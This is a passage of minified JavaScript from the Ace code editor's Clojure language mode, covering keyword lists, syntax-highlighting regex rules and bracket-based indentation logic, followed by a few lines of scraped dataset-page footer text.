resultset-seq reverse reversible? rseq rsubseq second select-keys send send-off seq seq? seque sequence sequential? set set-validator! set? short short-array shorts shutdown-agents slurp some sort sort-by sorted-map sorted-map-by sorted-set sorted-set-by sorted? special-form-anchor special-symbol? split-at split-with str stream? string? struct struct-map subs subseq subvec supers swap! symbol symbol? sync syntax-symbol-anchor take take-last take-nth take-while test the-ns time to-array to-array-2d trampoline transient tree-seq true? type unchecked-add unchecked-dec unchecked-divide unchecked-inc unchecked-multiply unchecked-negate unchecked-remainder unchecked-subtract underive unquote unquote-splicing update-in update-proxy use val vals var-get var-set var? vary-meta vec vector vector? when when-first when-let when-not while with-bindings with-bindings* with-in-str with-loading-context with-local-vars with-meta with-open with-out-str with-precision xml-seq zero? zipmap",t="throw try var def do fn if let loop monitor-enter monitor-exit new quote recur set!",n="true false nil",r=this.createKeywordMapper({keyword:t,"constant.language":n,"support.function":e},"identifier",!1," ");this.$rules={start:[{token:"comment",regex:";.*$"},{token:"keyword",regex:"[\\(|\\)]"},{token:"keyword",regex:"[\\'\\(]"},{token:"keyword",regex:"[\\[|\\]]"},{token:"keyword",regex:"[\\{|\\}|\\#\\{|\\#\\}]"},{token:"keyword",regex:"[\\&]"},{token:"keyword",regex:"[\\#\\^\\{]"},{token:"keyword",regex:"[\\%]"},{token:"keyword",regex:"[@]"},{token:"constant.numeric",regex:"0[xX][0-9a-fA-F]+\\b"},{token:"constant.numeric",regex:"[+-]?\\d+(?:(?:\\.\\d*)?(?:[eE][+-]?\\d+)?)?\\b"},{token:"constant.language",regex:"[!|\\$|%|&|\\*|\\-\\-|\\-|\\+\\+|\\+||=|!=|<=|>=|<>|<|>|!|&&]"},{token:r,regex:"[a-zA-Z_$][a-zA-Z0-9_$\\-]*\\b"},{token:"string",regex:'"',next:"string"},{token:"constant",regex:/:[^()\[\]{}'"\^%`,;\s]+/},{token:"string.regexp",regex:'/#"(?:\\.|(?:\\")|[^""\n])*"/g'}],string:[{token:"constant.language.escape",regex:"\\\\.|\\\\$"},{token:"string",regex:'[^"\\\\]+'},{token:"string",regex:'"',next:"start"}]}};r.inherits(s,i),t.ClojureHighlightRules=s}),define("ace/mode/matching_parens_outdent",["require","exports","module","ace/range"],function(e,t,n){"use strict";var r=e("../range").Range,i=function(){};(function(){this.checkOutdent=function(e,t){return/^\s+$/.test(e)?/^\s*\)/.test(t):!1},this.autoOutdent=function(e,t){var n=e.getLine(t),i=n.match(/^(\s*\))/);if(!i)return 0;var s=i[1].length,o=e.findMatchingBracket({row:t,column:s});if(!o||o.row==t)return 0;var u=this.$getIndent(e.getLine(o.row));e.replace(new r(t,0,t,s-1),u)},this.$getIndent=function(e){var t=e.match(/^(\s+)/);return t?t[1]:""}}).call(i.prototype),t.MatchingParensOutdent=i}),define("ace/mode/clojure",["require","exports","module","ace/lib/oop","ace/mode/text","ace/mode/clojure_highlight_rules","ace/mode/matching_parens_outdent"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./text").Mode,s=e("./clojure_highlight_rules").ClojureHighlightRules,o=e("./matching_parens_outdent").MatchingParensOutdent,u=function(){this.HighlightRules=s,this.$outdent=new o};r.inherits(u,i),function(){this.lineCommentStart=";",this.minorIndentFunctions=["defn","defn-","defmacro","def","deftest","testing"],this.$toIndent=function(e){return e.split("").map(function(e){return/\s/.exec(e)?e:" "}).join("")},this.$calculateIndent=function(e,t){var n=this.$getIndent(e),r=0,i,s;for(var o=e.length-1;o>=0;o--){s=e[o],s==="("?(r--,i=!0):s==="("||s==="["||s==="{"?(r--,i=!1):(s===")"||s==="]"||s==="}")&&r++;if(r<0)break}if(!(r<0&&i))return r<0&&!i?this.$toIndent(e.substring(0,o+1)):r>0?(n=n.substring(0,n.length-t.length),n):n;o+=1;var u=o,a="";for(;;){s=e[o];if(s===" "||s===" ")return this.minorIndentFunctions.indexOf(a)!==-1?this.$toIndent(e.substring(0,u-1)+t):this.$toIndent(e.substring(0,o+1));if(s===undefined)return this.$toIndent(e.substring(0,u-1)+t);a+=e[o],o++}},this.getNextLineIndent=function(e,t,n){return this.$calculateIndent(t,n)},this.checkOutdent=function(e,t,n){return this.$outdent.checkOutdent(t,n)},this.autoOutdent=function(e,t,n){this.$outdent.autoOutdent(t,n)},this.$id="ace/mode/clojure"}.call(u.prototype),t.Mode=u})
|
PypiClean
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.